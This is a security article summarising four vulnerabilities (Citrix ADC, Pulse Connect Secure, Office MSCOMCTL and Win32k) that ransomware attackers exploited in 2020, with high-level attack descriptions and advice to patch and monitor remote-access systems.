4 top vulnerabilities ransomware attackers exploited in 2020

The biggest security trend for 2020 has been the increase of COVID-19-related phishing and other attacks targeting remote workers. New York City, for example, has gone from having to protect 80,000 endpoints to around 750,000 endpoints in its threat management since work-from-home edicts took place.

As noted in a recent Check Point Software Technologies mid-year review, “The first impact of the pandemic was the proliferation of malware attacks that used social engineering techniques with COVID-19 thematic lures for the delivery stage.”  Domain names were set up and parked with names relating to the pandemic. As workers started to use videoconferencing platforms, attacks moved to attacking Zoom, Teams and other videoconferencing platforms.

One disturbing trend is that 80% of the observed attacks in the first half of 2020 used vulnerabilities reported and registered in 2017 and earlier, according to the Check Point report, and more than 20% of the attacks used vulnerabilities that are at least seven years old. This showcases that we have a problem in keeping our software up to date.

Ransomware remains a big threat 2020, but what interested me in a recent SenseCy study was that the ransomware attacks it identified were not all triggered by Windows vulnerabilities. Attackers used vulnerabilities in tools used for remote access into Windows networks. These are the top four of the vulnerabilities the researchers identified:

CVE-2019-19781: Citrix Application Delivery Controller

CVE-2019-19781 impacts remote access appliances manufactured by Citrix and was disclosed in December 2019 and fixed in January. Attackers use the Citrix vulnerabilities as an entry point and then pivot to other Windows vulnerabilities to gain further access.

As noted in a FireEye blog post, the Ragnarok ransomware attacks used the Citrix vulnerability to gain entry and then download a native tool used as part of Windows Certificate Services (categorized as Technique 11005 within MITRE’s ATT&CK framework). The attackers then executed the downloaded binary since1969.exe, located in C:UsersPublic, and deleted the URL from the current user’s certificate cache.

To ensure that your Citrix Gateway appliances are not impacted by this vulnerability, download and use the FireEye/Citrix scanner tool located on GitHub. This vulnerability has been tied to the introduction of Sodinokibi/REvil, Ragnarok, DopplePaymer, Maze, CLOP and Nephilim ransomware. Check Point reported similar trends in remote access. The use of remote access technologies including RDP and VPN led to a sharp rise in RDP brute force attacks.

CVE-2019-11510 Pulse Connect Secure

CVE-2019-11510 has been used and abused by many attackers for many things this year. Pulse Secure provides VPN connections to networks, and the use of the software dramatically increased as more people worked from home. An April blog post by Microsoft noted: “REvil (also called Sodinokibi) gained notoriety for accessing MSPs and accessing the networks and documents of customers – and selling access to both. They kept up this activity during the COVID-19 crisis, targeting MSPs and other targets like local governments.”

The vulnerability was also used to capture and expose the passwords of more than 900 VPN enterprise servers. In June, Black Kingdom ransomware attacks also used the Pulse VPN vulnerability to launch an attack that spoofed a legitimate scheduled task for Google Chrome.

CVE 2012-0158: Microsoft Office Common Controls

The next of the four vulnerabilities that have caused the bulk of the ransomware attacks in 2020 amazingly enough is a vulnerability from years ago. CVE 2012-0158 was also a top vulnerability in 2019. In March 2020, government and medical organizations were targeted with attacks trying to leverage this 2012 vulnerability by “sending a rich text format (RTF) document named ‘20200323-sitrep-63-covid-19.doc,’ which, when opened, attempted to deliver EDA2 ransomware by exploiting a known buffer overflow vulnerability (CVE-2012-0158) in Microsoft’s ListView / TreeView ActiveX controls in MSCOMCTL.OCX library.”

CVE-2018-8453: Windows Win32k components

CVE-2018-8453 is a 2018 vulnerability in the win32k.sys component of Windows. The Brazil-based energy company Light S.A was hit with ransomware that used this vulnerability to escalate privileges by leveraging 32-bit and 64-bit exploits in the Win32k component of Windows.

A disturbing trend is the number and age of vulnerabilities these attacks use. It showcases the need to review patch management processes to ensure that you are patching for entry points and scanning for older vulnerabilities that patching tools might have missed.

It’s time to review your environment. Have your endpoints increased due to the pandemic? Have you reviewed your access points to ensure they are patched, protected and monitored? Have you increased telemetry and helpdesk processes to better be alerted to issues before they occur?

Take the time to step back and review where you are now. Can you patch better? Can you communicate better? Can you protect better?